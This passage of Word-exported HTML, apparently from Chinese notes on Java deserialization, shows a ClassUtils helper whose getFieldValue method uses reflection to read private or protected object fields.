'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">提供访问私有变量,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">获取泛型类型</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">提取集合中元素属性等</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Utils </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">函数</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> ClassUtils </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">直接读取对象的属性值,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">忽略</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> private</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">protected </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">修饰符,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">也不经过</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> getter</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getFieldValue</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> field </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">field </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">==</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">throw</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalArgumentException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"Could not find field ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"] on target ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"]"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">makeAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> result </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>result </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              